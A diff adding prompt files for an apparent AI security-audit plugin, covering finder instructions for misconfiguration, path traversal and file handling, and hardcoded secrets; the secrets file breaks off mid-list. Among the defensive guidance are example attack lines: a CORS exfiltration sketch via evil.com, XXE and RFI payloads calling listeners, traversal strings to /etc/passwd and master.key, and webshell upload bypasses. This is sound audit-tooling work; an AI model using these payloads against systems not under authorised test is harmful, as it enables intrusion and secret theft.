+- **XML parser is hardened or can't see untrusted input:** DTDs disabled
+  (`disallow-doctype-decl=true`, `XMLConstants.FEATURE_SECURE_PROCESSING`,
+  `setExpandEntityReferences(false)`, external entities/DTD off), `defusedxml`
+  used, `LIBXML_NONET` + entity loader disabled, or the parser only consumes
+  trusted internal/config XML. Stdlib parsers that don't resolve external
+  entities by default (Go `encoding/xml`, most Node XML libs, Crystal/Rust) are
+  not XXE absent an explicit enable flag.
+- **Default credential is dev-only / forced-rotation:** the literal fallback is
+  guarded so prod boot fails if the env var is unset (`raise unless ENV["X"]`),
+  or it's only in `docker-compose.dev.yml`/test fixtures, or the app forces a
+  password change on first login. A weak default that prod can actually run with
+  IS a finding.
+- **Cloud resource is intentionally public & non-sensitive** (a static-asset/CDN
+  bucket serving only public content) — confirm no secrets/PII; otherwise the
+  public ACL on a data bucket is a finding.
+- **No reachable untrusted caller / not the prod build:** the config block is in
+  a sample/`*.example`/test/seed file the running app does not load, or is dead.
+
+If a guard exists but is bypassable (substring origin match, derivable Flask
+debug PIN, actuator "secured" only by an unenforced annotation, env check that
+prod actually trips), it is NOT a mitigation — flag it and name the bypass in
+`sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, network-reachable: production `DEBUG`/debug
+  console enabling RCE or SECRET_KEY/credential disclosure (Flask Werkzeug
+  console, Django traceback leaking `SECRET_KEY`); exposed actuator `/jolokia`/
+  `/heapdump`/`/env` or `/shutdown`; unauthenticated admin dashboard with
+  privileged actions; default admin creds reachable on the public login; XXE that
+  reads local files / SSRFs / hits OOB with attacker-supplied XML on an unauthed
+  endpoint; world-readable bucket holding secrets/PII.
+- **High** — reflected-origin CORS + `Allow-Credentials` on an authed endpoint
+  (cross-site read of victim data); authenticated-but-broad actuator/metrics leak
+  (env, mappings, threaddump); default creds behind a low barrier; verbose
+  stack-trace/SQL-error page leaking schema/secrets to any caller; XXE limited to
+  OOB/blind or requiring auth.
+- **Medium** — `ACAO:*` without credentials exposing semi-sensitive data;
+  introspection/playground enabled in prod (info disclosure, no creds); metrics
+  endpoint leaking internal hostnames/timings; missing `HttpOnly` on a session
+  cookie with a plausible XSS path; public bucket of non-critical internal data;
+  SG open to the world on a non-critical port.
+- **Low/Info** — missing security header with no concrete exploit (clickjacking
+  on a non-state-changing page), missing `Secure` flag when TLS-only is otherwise
+  enforced, debug flag only reachable in a non-prod env. Generic header hardening
+  with no sink → Info appendix, not the body.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup; list extra locations in
+`rationale`). Fields:
+
+```json
+{
+  "id": "misconfig-001",
+  "title": "Credentialed CORS reflects arbitrary Origin on authed API",
+  "vuln_class": "misconfig",
+  "owasp": "A02:2025",
+  "cwe": "CWE-942",
+  "asvs": "V13",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/server.ts",
+  "line": 28,
+  "end_line": 31,
+  "code_excerpt": "app.use(cors({ origin: (o, cb) => cb(null, true), credentials: true }));",
+  "source": "Cross-origin browser request's Origin header (any attacker-controlled site); reaches all routes incl. authenticated /api/account",
+  "sink": "cors() reflects the request Origin into Access-Control-Allow-Origin AND sets Access-Control-Allow-Credentials: true",
+  "data_flow": "attacker page -> fetch('/api/account',{credentials:'include'}) -> server reflects Origin -> browser permits cross-site read of the authed JSON response; no origin allowlist on the path",
+  "sanitizers_checked": "no exact-origin allowlist (origin callback returns true for every origin); credentials NOT disabled; not gated to dev; route requires a session cookie that is auto-sent cross-site (SameSite not Strict), so reflection is exploitable",
+  "rationale": "Any malicious origin can read authenticated responses for a logged-in victim. Same config governs /api/* (12 routes). Distinct from the ACAO:* + credentials non-case because the origin is reflected, which browsers DO honor with credentials.",
+  "exploit_sketch": "Host evil.com page: fetch('https://target/api/account',{credentials:'include'}).then(r=>r.text()).then(exfil). Browser sends victim cookies, server reflects evil.com, response is readable.",
+  "dynamic_poc_plan": "curl with Origin: https://evil.com against /api/account using a valid session cookie; observe response headers ACAO: https://evil.com and ACAC: true mirroring the attacker origin.",
+  "proposed_fix": "Constrain credentialed CORS to a fixed set of trusted origins instead of reflecting arbitrary ones, so cross-site reads of authed responses are no longer possible. High-level direction, not a patch — the exact allowlist and enforcement are left to the engineer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, `sanitizers_checked` must be
+concrete and true. For setting-exposure findings, `source` is the untrusted
+caller/origin that reaches the surface and `sink` is the precise directive; for
+XXE, `source` is the attacker XML and `sink` is the entity-resolving parse call.
+`data_flow` shows how the untrusted caller reaches the misconfigured surface and
+why no env-gate/auth/allowlist stops it. `sanitizers_checked` is the §4 FP guard
+made explicit — list each relevant guard and state it is absent or name the
+exact bypass. Verify the **production/default** value, not a dev override. Use
+`status:"likely"` for a proven static config + reachability, `"confirmed"` only
+after dynamic repro, `"triage"` if reachability/prod-applicability is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the *running* app exposes the surface to an untrusted caller. Build &
+boot the target in the isolated worktree (docker-first) in its production-like
+mode, then:
+
+- **Debug/error leak:** trigger an unhandled error (malformed input, missing
+  param, bad type) and `curl` the route. **Proof:** response body contains a
+  stack trace, framework debug page, `SECRET_KEY`/env dump, SQL, or source. For
+  Flask debug, hit `/console` and show the interactive prompt (do not run code
+  beyond a benign `1+1`).
+- **CORS:** `curl -H 'Origin: https://evil.example' -i <endpoint>`. **Proof:**
+  `Access-Control-Allow-Origin: https://evil.example` (reflected) together with
+  `Access-Control-Allow-Credentials: true`, or `ACAO: *` on sensitive data. Note
+  the inert `*`+credentials combo is NOT proof.
+- **Management/admin/metrics:** unauthenticated `curl /actuator/env`,
+  `/actuator/heapdump`, `/metrics`, `/debug/pprof/`, GraphQL
+  `{__schema{types{name}}}`, Swagger JSON, or the dashboard root. **Proof:** 200
+  with internal data (env vars, heap, metrics, schema) and no auth challenge.
+- **Default creds:** POST the shipped default to the login/admin endpoint.
+  **Proof:** authenticated session / 200 with a privileged token.
+- **XXE:** POST an XML body with a DOCTYPE pulling a local file or an OOB
+  callback: `<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]><r>&x;</r>`
+  (or `SYSTEM "http://<listener>/xxe-<nonce>"` for blind). **Proof:** response
+  echoes the file content, or the auditor's listener logs the nonce hit from the
+  server. Use `/etc/hostname` (benign) for the read demo.
+- **Public bucket:** anonymous `GET` of the object URL (no creds/SDK). **Proof:**
+  200 returning the object to an unauthenticated client.
+
+Record the exact request and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). If only the
+config is provable but the live surface can't be booted, downgrade to a static
+trace (`status:"likely"`, `method:"static-poc"`) and say so in `notes`.
diff --git a/plugins/security/prompts/finders/path-file.md b/plugins/security/prompts/finders/path-file.md
new file mode 100644
index 0000000..0f3d698
--- /dev/null
+++ b/plugins/security/prompts/finders/path-file.md
@@ -0,0 +1,337 @@
+<!--
+FINDER PROMPT — path-file. You are a fresh-context auditor hunting ONE class:
+Path Traversal & File Handling (directory traversal, LFI/RFI, unrestricted/
+unsafe file upload, zip-slip archive extraction, user-controlled file paths).
+Read the target's code; emit finding objects. Signal discipline (AGENTS.md) is
+binding: only a REACHABLE untrusted-input → filesystem/include sink, where the
+input controls the resolved path/name/destination AND no effective canonicalize-
+and-confine check sits on the path, is a finding. No defense-in-depth musings,
+no dead code, no posture items.
+-->
+
+# Finder — Path Traversal & File Handling (`path-file`)
+
+**Class key:** `path-file` · **OWASP:** A01:2025 · **CWE:** CWE-22 (path
+traversal) / CWE-98 (PHP file include / RFI) / CWE-73 (external control of
+filename or path) / CWE-434 (unrestricted upload of dangerous file type) ·
+**ASVS:** V5
+
+## 1. Objective
+
+Find places where untrusted input controls *which* file or directory the server
+reads, writes, includes, serves, or extracts to — such that the attacker escapes
+the intended base directory (`../`, absolute path, symlink), reads/overwrites
+arbitrary files, includes attacker code (LFI/RFI), or lands an
+executable/dangerous file in a served/executed location. The bug is the resolved
+path/destination being attacker-influenced and not confined to a safe root.
+
+## 2. Where to look
+
+Entry points where a request value becomes part of a path, filename, include
+target, or extraction destination:
+
+- **File download / static serving:** `/download?file=`, `/files/:name`,
+  `/attachments/:id/raw`, `sendFile`/`send_file`/`X-Sendfile` handlers,
+  documentation/asset servers, `?template=`, `?page=`, `?view=`, `?lang=`,
+  `?theme=`, report/export downloaders, "view source"/log viewers, avatar/media
+  fetchers keyed by a user-supplied name.
+- **File upload:** multipart handlers that derive the *stored* path/name from the
+  client filename or a `Content-Type`/extension, "import"/"attachment"/"profile
+  picture"/"resume" endpoints, chunked-upload assemblers, S3/GCS key builders
+  fed the original filename, profile/CMS media managers.
+- **Archive / package extraction (zip-slip):** zip/tar/gzip/7z/rar extractors,
+  plugin/theme/template installers, backup restore, "import project", container/
+  image layer unpackers, anything iterating archive entries and joining
+  `entry.name` to an output dir.
+- **Includes / dynamic loading (LFI/RFI):** template engine paths, `require`/
+  `include`/`import` of a user-named module/partial, i18n/locale file loaders,
+  config/plugin loaders that build a path from input, `render(params[:template])`.
+- **Path-building utilities:** any `join`/`+`/interpolation that concatenates a
+  base dir with a request value, then opens/reads/writes/deletes it; log file
+  selectors; `fopen`/`open`/`File.read`/`unlink`/`rmdir` with a computed name.
+
+Route/handler param signals to grep: `file`, `filename`, `name`, `path`, `dir`,
+`folder`, `doc`, `page`, `template`, `view`, `include`, `require`, `module`,
+`lang`, `locale`, `theme`, `skin`, `report`, `export`, `download`, `attachment`,
+`asset`, `media`, `image`, `avatar`, `src`, `dest`, `target`, `key`, `id` (when
+mapped to a path), `archive`, `zip`, `upload`. Watch for `..`, leading `/`,
+drive letters (`C:\`), and NUL (`%00`) appearing in tests/fixtures — they hint
+where the dev already worried about traversal.
+
+Per-language SINK signals:
+
+- **Crystal:** `File.read/open/write/delete`, `File.join(base, x)`,
+  `Dir.glob`, `send_file env, path`, Kemal/Lucky static handlers; archive via
+  `Compress::Zip::Reader` joining `entry.filename`.
+- **Ruby:** `File.read/open/binread/write/delete`, `File.join(base, params[:f])`,
+  `IO.read`, `send_file`/`send_data path`, `Rack::File`/`Rack::Static`,
+  `render file:`/`render template:` with input, `Kernel#load`/`require` of a
+  computed path, `Zip::File.open` / `Gem::Package::TarReader` entry-name joins,
+  `FileUtils.cp/mv` to a derived dest, `Marshal.load(File.read(x))`.
+- **Node/TS:** `fs.readFile/readFileSync/createReadStream/writeFile/unlink`,
+  `path.join(base, req.params.x)`, `res.sendFile(p)`, `express.static`,
+  `res.download(p)`, `require(userPath)`, `import(userPath)`,
+  template `res.render(req.query.view)`; unzip via `unzipper`/`adm-zip`
+  `entry.path`, `tar.x` without `filter`/`strip`, `decompress`.
+- **Python:** `open(path)`, `os.path.join(base, x)`, `pathlib.Path(base)/x`,
+  `send_file(p)`/`send_from_directory(dir, x)` (the latter is the safe one *if*
+  used correctly), `flask.render_template(x)`, `shutil.copy/move`,
+  `zipfile.ZipFile.extract/extractall`, `tarfile.extractall` (no `filter=` /
+  pre-3.12), `importlib.import_module(x)`, `pickle.load(open(x))`.
+- **Go:** `os.Open/ReadFile/Create/WriteFile/Remove`, `filepath.Join(base, x)`,
+  `http.ServeFile(w, r, p)`, `http.Dir`/`FileServer` rooted at a bad base,
+  `template.ParseFiles(x)`; archive via `zip.OpenReader` + `filepath.Join(dst,
+  f.Name)`, `tar.Next()` header `Name` joined to dst.
+- **PHP:** `include`/`include_once`/`require`/`require_once($x)` (LFI/RFI — the
+  marquee sink), `file_get_contents($x)`, `fopen($x)`, `readfile($x)`,
+  `file($x)`, `unlink($x)`, `move_uploaded_file($tmp, $dest)` with derived dest,
+  `fputs`/`fwrite` to a computed path, `ZipArchive::extractTo($dir)`,
+  `phar://`/`zip://`/`php://filter` wrapper abuse.
+- **Java:** `new File(base, x)` / `Paths.get(base, x)` then `Files.read*/write*/
+  newInputStream`, `FileInputStream(x)`, `Files.copy`, `response.sendRedirect`/
+  `getResourceAsStream(x)`, `RequestDispatcher.include/forward(userPath)`,
+  Spring `Resource`/`ResourceLoader.getResource(x)`, `ServletContext.getRealPath`;
+  archive via `ZipInputStream` + `new File(dir, entry.getName())`,
+  `TarArchiveInputStream`.
+- **Rust:** `std::fs::read/write/File::open/remove_file`, `Path::join(base, x)` /
+  `base.join(x)`, `PathBuf::from(x)`, actix/axum static-file or
+  `NamedFile::open(p)`; archive via `zip::ZipArchive` `file.enclosed_name()`
+  (the safe call) vs joining `file.name()` raw, `tar::Archive::unpack`.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP query/body/path-segment/header/cookie values,
+the **client-supplied multipart filename** (`Content-Disposition` `filename=`),
+`Content-Type`/declared extension, JSON/form fields naming a file, **archive
+entry names** (`zip`/`tar` member paths — the attacker authored the archive, so
+every entry name is tainted), message-queue/webhook payloads, and **DB rows that
+were originally user-set** (stored path injection — a filename saved earlier,
+later joined into a read/serve path). Also: `Location`/symlink targets the code
+follows, and URLs in include directives (RFI).
+
+**Taint SINKS** (dangerous op): the language-specific calls in §2 where the
+tainted value determines the **resolved path, filename, include target, or
+extraction destination** — i.e. it is joined/concatenated/interpolated into a
+path then opened/read/written/deleted/served, passed to `include`/`require`/
+`import`/`render`, or used as (part of) an archive-extraction output path.
+
+Vulnerable patterns to confirm:
+
+- **Classic `../` traversal (read):** `File.read(File.join("uploads",
+  params[:file]))` / `open(os.path.join(BASE, name))` /
+  `fs.readFile(path.join(dir, req.params.name))` with no canonicalize-and-confine
+  → `name="../../../../etc/passwd"`. On Windows also `..\\` and `C:\\`.
+- **Absolute-path override:** many `join`/`File`/`Paths.get` semantics let an
+  *absolute* second arg discard the base — Python `os.path.join("/srv", "/etc/
+  passwd") == "/etc/passwd"`, Go `filepath.Join` collapses but an absolute
+  `x` after a trailing check still escapes, Java `new File(base, "/etc/passwd")`.
+  So even input with no `..` can be absolute.
+- **Traversal write / overwrite (more severe):** upload or write where the
+  destination derives from input → overwrite `~/.ssh/authorized_keys`, a cron
+  file, a web-root script, or app config. `move_uploaded_file($tmp,
+  "uploads/".$_FILES['f']['name'])` with `name="../config.php"`.
+- **Zip-slip / tar-slip:** loop over archive entries joining the entry name to an
+  output dir *without* verifying the resolved path stays under the dir →
+  `entry.name = "../../../../etc/cron.d/x"`. Tells: `new File(dir,
+  entry.getName())`, `filepath.Join(dst, hdr.Name)`, `path.join(out,
+  entry.path)`, `zipEntry.extractTo($dir)` with no per-entry confinement, and
+  symlink entries pointing outside (tar symlink slip). The safe calls
+  (`enclosed_name()`, `tarfile` `filter='data'`, `tar.x` with a `filter`) are
+  often *available but unused* right beside the vuln.
+- **LFI:** `include $_GET['page'].".php"` / `require($base.$x)` /
+  `render(params[:template])` / `res.render(req.query.view)` — attacker reads/
+  executes local files (`../../../../etc/passwd%00`, `php://filter/convert.base64
+  -encode/resource=config.php`, log poisoning → code exec).
+- **RFI:** `include($_GET['mod'])` with `allow_url_include`/`allow_url_fopen`, or
+  `require(userUrl)` / dynamic `import(remoteUrl)` → attacker includes
+  `http://evil/shell.txt` for RCE.
+- **Unrestricted / unsafe upload:** stored file gets an attacker-chosen extension
+  *and* lands in a served/executed dir → upload `shell.php`/`x.jsp`/`.aspx` into
+  the web root → RCE. Also: extension/`Content-Type` allowlist that is bypassable
+  (`shell.php.jpg`, `shell.pHp`, double extension, `.phtml`/`.php5`, NUL/`;`
+  truncation, polyglot, `.htaccess`/`web.config` upload re-enabling exec).
+- **Filename used unsanitized for storage:** `filename` from the client used as
+  the on-disk name without stripping the directory component → traversal *and*
+  collision/overwrite.
+- **Null-byte / encoding truncation:** `%00`, double-URL-encoding (`%252e%252e`),
+  overlong UTF-8, `..%2f`, `..\\`, mixed separators — used to slip past naive
+  string checks (still relevant in some runtimes / native libs).
+- **Second-order:** filename/path saved safely, later read and joined into a
+  read/serve/delete path without re-confinement.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Canonicalize-then-confine** (the gold standard): code resolves the path to its
+  real, absolute, symlink-free form and verifies it is *inside* the intended base
+  before use — `File.realpath`/`Pathname#realpath` + prefix check, Node
+  `fs.realpathSync(p)` then `resolved.startsWith(baseReal + path.sep)`, Python
+  `os.path.realpath`/`Path.resolve()` + `is_relative_to(base)`, Go
+  `filepath.Clean` then `strings.HasPrefix(abs, base+sep)` *after*
+  `filepath.Abs`, Java `getCanonicalPath().startsWith(baseCanonical)` or
+  `Path.normalize()` + `startsWith`, Rust `canonicalize()` + `starts_with`. The
+  prefix check must use the *canonical/real* path (resolves `..` and symlinks)
+  and a separator-bounded prefix (so `/srv/dataEVIL` doesn't match `/srv/data`).
+- **Framework safe-serve API used correctly:** Flask `send_from_directory(dir,
+  name)` (rejects `..`/absolute), Rails `send_file` with a value derived from a
+  whitelisted id (not raw user path), Django `FileResponse` of a path validated
+  against a root, Go `http.ServeFile` *only* when the path is confined and
+  `r.URL.Path` is cleaned, Spring serving a `Resource` resolved under a root with
+  `..` rejected. The API alone isn't enough — confirm the *input* it receives is
+  confined or id-mapped.
+- **Indirect mapping / opaque id:** user supplies an id/key looked up in a DB or a
+  fixed map that yields the real path; the raw user string never touches the
+  filesystem path. This fully closes traversal — safe.
+- **Closed allowlist of names/paths:** input matched against a fixed set
+  (`{"en"=>"en.json", ...}`, enum of allowed templates) before building the path.
+- **Strict basename + extension allowlist on the path:** `File.basename`/
+  `path.basename`/`os.path.basename` strips any directory component AND the
+  result is validated (allowlisted extension, no leading dot/slash) AND it is
+  joined under a confined base. Basename *alone* still permits absolute-discard on
+  some `join`s and doesn't stop overwrite-within-dir — credit it only when
+  combined with confinement.
+- **Upload safety done right:** stored name is server-generated (UUID/hash), the
+  storage dir is **outside any served/executed root** (or served with execution
+  disabled — static-only, no script handler, `X-Content-Type-Options: nosniff`),
+  and type is validated by content sniff (magic bytes) not just extension/declared
+  `Content-Type`. All three together ⇒ not a finding.
+- **Archive extraction confined:** each entry's resolved destination is checked to
+  stay under the output dir before write (`enclosed_name()`, `tarfile`
+  `filter='data'` on 3.12+/backport, `tar.x({filter})`, explicit
+  `resolved.startsWith(outReal+sep)` per entry), symlink entries are rejected/
+  skipped, and entry size/count limits exist (the slip is closed even if a
+  zip-bomb remains — note bomb separately if present).
+- **No untrusted source on the path:** the path component is a hardcoded constant,
+  an operator/config value, an internal enum, or a typed/validated id that cannot
+  carry separators (`:id(\d+)` route, integer cast). A path built entirely from
+  trusted parts is not a finding.
+
+If a guard exists but is bypassable, it is NOT a mitigation — flag it and name the
+exact bypass in `sanitizers_checked`. Specifically reject as ineffective:
+**denylist string-replace** (`replace("../","")` — defeated by `....//`,
+`..%2f`, absolute path, or a single non-recursive pass), **prefix check on the
+non-canonical string** (doesn't resolve symlinks/`..`), **un-separator-bounded
+prefix** (`startsWith("/srv/data")` matches `/srv/data-evil`), **`..`-only
+filtering that ignores absolute paths / drive letters / null bytes**,
+**extension/`Content-Type` allowlist alone** for uploads (sniff bypass, double
+extension, `.htaccess`), and **`basename` applied but the dir is still served as
+executable**.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable: **RFI / LFI-to-RCE** (include of an
+  attacker URL or local file that gets executed; log-poisoning chain), **upload
+  of an executable into a served/executed dir → webshell RCE**, **zip-slip /
+  traversal *write*** that overwrites a startup script / cron / `authorized_keys`
+  / app code → RCE or full auth bypass, or arbitrary-file-**read** of secrets that
+  yields immediate compromise (e.g. reading `.env`/private keys → game over).
+  Attacker fully controls the resolved path/destination.
+- **High** — authenticated or realistically-conditioned arbitrary file read
+  (`/etc/passwd`, app source, other tenants' files), traversal write/overwrite
+  behind an auth wall, or upload-to-RCE requiring a known but reachable served
+  path; zip-slip behind authn.
+- **Medium** — constrained traversal: read limited to a subtree or to a fixed
+  extension, partial mitigation (basename applied but absolute-path or symlink
+  gap remains), blind/whitelisted-but-bypassable, or file *delete* of low-value
+  targets. Upload with weak type checks but storage outside any exec root (no RCE,
+  possible stored XSS/content-spoof — note the secondary impact).
+- **Low/Info** — traversal provably confined to non-sensitive files with effective
+  basename+confinement leaving only a minor predictable-name/info concern, or a
+  theoretical join where input cannot carry separators. Usually downgrade or drop
+  per §4.
+
+Second-order/stored path injection keeps the severity of its eventual sink; note
+the write→read persistence in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "path-file-001",
+  "title": "Unauthenticated arbitrary file read via traversal in /download?file=",
+  "vuln_class": "path-file",
+  "owasp": "A01:2025",
+  "cwe": "CWE-22",
+  "asvs": "V5",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/controllers/downloads_controller.rb",
+  "line": 12,
+  "end_line": 14,
+  "code_excerpt": "path = File.join(Rails.root.join(\"storage\"), params[:file])\n  send_file path",
+  "source": "params[:file] — GET /download query string; route has no auth filter (before_action :authenticate missing on this action)",
+  "sink": "File.join(storage, params[:file]) -> send_file path — opens and streams a path the caller controls",
+  "data_flow": "params[:file] -> File.join(storage_root, params[:file]) -> send_file; File.join does not resolve or confine, so '../' segments escape storage_root; no realpath+prefix check between source and sink",
+  "sanitizers_checked": "no File.basename (directory component preserved); no realpath/canonicalize + base-prefix confinement; no allowlist/id-mapping; no extension restriction; absolute path also escapes (File.join with leading-slash arg); not the send_from_directory-style safe API",
+  "rationale": "Reachable from unauth route; file=../../../../etc/passwd resolves outside storage and is streamed back. Same unconfined join at reports_controller.rb:40 (export download).",
+  "exploit_sketch": "GET /download?file=../../../../../../etc/passwd -> response body is /etc/passwd; file=../../config/master.key leaks the Rails secret.",
+  "dynamic_poc_plan": "Against the running app, request /download?file=../../../../etc/passwd and a control file=readme.txt; confirm the traversal response returns the host file (root:x:0:0 line) while the control returns the in-dir file, proving escape from storage_root.",
+  "proposed_fix": "Confine the served path to the storage root and stop letting raw user input determine it — resolve+confine to the base (or map an opaque id to the stored path) so '../'/absolute segments cannot escape. High-level direction, not a patch; the implementing engineer chooses the exact mechanism and code."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces the variable source→sink and states why the
+resolved path/destination is attacker-influenced and unconfined (join/concat/
+include/extract), naming any guard encountered and why it fails. `sanitizers_
+checked` is the FP guard made explicit — list each §4 control and state it is
+absent or, if present, name the exact bypass (e.g. "replace('../','') is
+single-pass — `....//` survives", "prefix check on the pre-realpath string —
+symlink bypass", "extension allowlist only — `shell.php.jpg` / sniff bypass").
+A finding without an untrusted source reaching a real filesystem/include sink in
+path-determining position is not a finding. Pick `cwe` by subtype: 22 traversal,
+98 PHP include/RFI, 73 external control of filename/path, 434 unrestricted upload.
+Use `status:"likely"` for a proven static trace, `"confirmed"` only after dynamic
+repro, `"triage"` if reachability/source is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running app resolves the path/destination outside its intended
+root (or executes/serves an attacker file). Pick the oracle matching the subtype:
+
+1. **Read traversal — host-file oracle.** Send the traversal payload and a benign
+   control to the same endpoint:
+   `?file=../../../../../../etc/passwd` vs `?file=<known-in-dir-file>`.
+   **Observed proof** = the traversal response returns content that only exists
+   outside the base (the `root:x:0:0:` line of `/etc/passwd`, or the app's
+   `.env`/`config/master.key`/private key), while the control returns the in-dir
+   file. Try encodings if a naive filter is present: `..%2f`, `%252e%252e%252f`,
+   `....//`, `..\\` (Windows), trailing `%00`/`.jpg` truncation.
+2. **Write / zip-slip — landed-file oracle.** Upload or extract a crafted
+   archive whose entry name escapes the output dir
+   (`../../../../tmp/pwn-<nonce>` or, for impact, a path under a writable
+   exec/startup dir). **Observed proof** = the file appears at the out-of-dir
+   absolute path after extraction (`ls /tmp/pwn-<nonce>` / read it back),
+   confirming the join wrote outside the destination. For overwrite impact, target
+   a benign sentinel file and show its contents changed.
+3. **Upload-to-RCE — webshell oracle.** Upload a file with an executable
+   extension and a unique marker payload (e.g. a script printing the nonce), then
+   request its served URL. **Observed proof** = fetching the uploaded path returns
+   the *executed* output (the computed nonce), not the source — proving the file
+   landed in an executable, served location. If exec is blocked but the file is
+   served raw with an attacker MIME, demonstrate stored-XSS/content-spoof instead
+   and downgrade impact accordingly.
+4. **LFI/RFI — include oracle.** For LFI, point the include/template/page param at
+   a readable local file or `php://filter/convert.base64-encode/resource=<src>`;
+   **observed proof** = file contents (or base64 source) appear in the response.
+   For RFI, host a marker payload on a listener the auditor controls and set the
+   include param to that URL; **observed proof** = the listener is hit AND the
+   remote payload's output (nonce) appears in the response — proving remote
+   inclusion/execution.
+
+Run the relevant bypass checks when a partial guard exists: denylist evasion
+(`....//`, double-encoding, mixed/absolute paths, drive letters, NUL truncation),
+non-canonical prefix-check evasion (symlink inside the base pointing out;
+`baseEVIL` prefix collision), and upload type-check evasion (double extension,
+case, polyglot, `.htaccess`/`web.config`). Record the exact request/payload and
+the observed out-of-root evidence in the `Repro` object (`reproduced`,
+`method:"live-exploit"`, `poc`, `observed`, `impact`). An out-of-band callback (RFI)
+or a landed out-of-dir file (zip-slip) alone proves the class — set
+`method:"live-exploit"`. If the app can't be run, fall back to a focused unit test
+that drives the sink with the traversal/slip payload and asserts the resolved path
+escapes the base (`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/secrets.md b/plugins/security/prompts/finders/secrets.md
new file mode 100644
index 0000000..f6226c5
--- /dev/null
+++ b/plugins/security/prompts/finders/secrets.md
@@ -0,0 +1,311 @@
+<!--
+FINDER PROMPT — secrets. You are a fresh-context auditor hunting ONE class:
+Hardcoded Secrets & Credentials. Read the target's code, config, and history;
+emit finding objects. Signal discipline (AGENTS.md) is binding: a finding is a
+REAL secret that grants an attacker access to a REAL resource — a key/token/
+password embedded in code/config/history, or a weak default credential, where
+the credential is live (or trivially reachable) and not a placeholder, test
+fixture, public/non-secret value, or already-rotated artifact. No "rotate keys"
+musings without a concrete live secret, no flagging env-var reads, no entropy
+nags on non-secret strings, no posture items.
+-->
+
+# Finder — Hardcoded Secrets & Credentials (`secrets`)
+
+**Class key:** `secrets` · **OWASP:** A02:2025 (Security Misconfiguration — secret
+management) · **CWE:** CWE-798 (use of hard-coded credentials) / CWE-259
+(hard-coded password) / CWE-321 (hard-coded cryptographic key) / CWE-547
+(hard-coded sensitive constants) · **ASVS:** V14 (Configuration & Secret
+Management)
+
+## 1. Objective
+
+Find a **real, usable secret embedded in the source, config, build artifacts, or
+git history** — an API key, token, password, private key, connection string with
+credentials, or a weak/default credential the app ships with — such that anyone
+who can read the repo (or a fetched dependency/image) can authenticate as the
+app, decrypt its data, or take over an account. The bug is the secret's presence
+and liveness, not merely that "a secret exists somewhere."
+
+## 2. Where to look
+
+A secret is a finding when **(a) it is genuinely secret material, (b) it is live
+or trivially live, and (c) an attacker can read it** (public repo, leaked source,
+shipped binary/image, npm/gem package, git history). Map those three before
+flagging. Surfaces:
+
+- **Source literals:** assignments to `*_key`, `*_secret`, `*_token`,
+  `*password*`, `apikey`, `client_secret`, `access_token`, `private_key`,
+  `auth`, `bearer`, `signing_key`, `encryption_key`, `webhook_secret`, DSNs.
+  Inline in service-client constructors (S3/Stripe/Twilio/SendGrid/OpenAI/
+  Slack/GitHub/DB drivers), HTTP auth headers, and CI/deploy scripts.
+- **Config & infra files:** `.env`, `.env.*` (committed!), `config/*.yml`,
+  `application.properties`, `appsettings.json`, `settings.py`, `wp-config.php`,
+  `docker-compose.yml`, `Dockerfile` (`ENV`/`ARG SECRET=`), `k8s` manifests &
+  ConfigMaps (vs Secrets), `terraform/*.tf` + `*.tfvars`, `serverless.yml`,
+  `*.plist`, mobile `strings.xml`/`Info.plist`, `.npmrc`/`.pypirc`/`.netrc`,
+  `database.yml`, `secrets.yml`/`credentials.yml.enc` (unencrypted), Helm
+  `values.yaml`.
+- **Key material files:** committed `*.pem`/`*.key`/`id_rsa`/`*.p12`/`*.pfx`/
+  `*.jks`/`*.keystore`/`*.ppk`/`serviceAccount*.json` (GCP)/`*.kubeconfig`/
+  `*.crt` with private half/`*.gpg`/`*.asc` private blocks.
+- **Default / fallback credentials:** `admin/admin`, `root` with empty/known
+  password seeded in migrations/seeders/bootstrap, `password ||= "changeme"`,
+  `ENV["X"] || "hardcoded-fallback"`, dev creds reused in prod, default JWT/
+  session/encryption secret baked into the framework config when unset.
+- **Git history (critical surface):** secrets removed from HEAD but **still in
+  history** — `git log -p`, `git rev-list --all`, deleted `.env`, a key rotated
+  in a later commit but the old value still reachable. A removed secret that was
+  never rotated is still live.
+- **Build/CI:** `.github/workflows/*` / `.gitlab-ci.yml` / `Jenkinsfile` /
+  `.circleci/config.yml` with `echo $TOKEN` into logs, hardcoded registry/cloud
+  creds, `with:` inputs holding tokens (vs `secrets.X`), base64'd kubeconfigs.
+- **Frontend/client bundles:** secrets shipped to the browser/mobile/desktop —
+  any "secret" key in JS/TS that reaches a webpack/vite bundle, React Native,
+  Electron, Android/iOS resources. Server-side secrets in client code = leaked
+  to every user.
+
+Per-language / per-format SINK & literal signals:
+
+- **Crystal:** `Stripe.api_key = "sk_live_..."`, `ENV["X"]? || "fallback"`,
+  hardcoded `HTTP::Headers{"Authorization" => "Bearer ..."}`, `DB.open("postgres
+  ://user:pass@host")`, secrets in `shard.yml`/`config/*.cr` constants.
+- **Ruby:** `Stripe.api_key = "sk_live_..."`, `ENV.fetch("X", "default-secret")`,
+  `secret_key_base` literal in `config/secrets.yml`/`credentials`,
+  `config.secret_key_base = "..."`, `Net::HTTP` basic-auth literals, `Aws::
+  Credentials.new("AKIA...", "secret")`, seeds with `password: "admin"`.
+- **Node/TS:** `const API_KEY = "..."`, `process.env.X || "hardcoded"`,
+  `new Stripe("sk_live_...")`, `jwt.sign(p, "supersecret")`, `axios` headers with
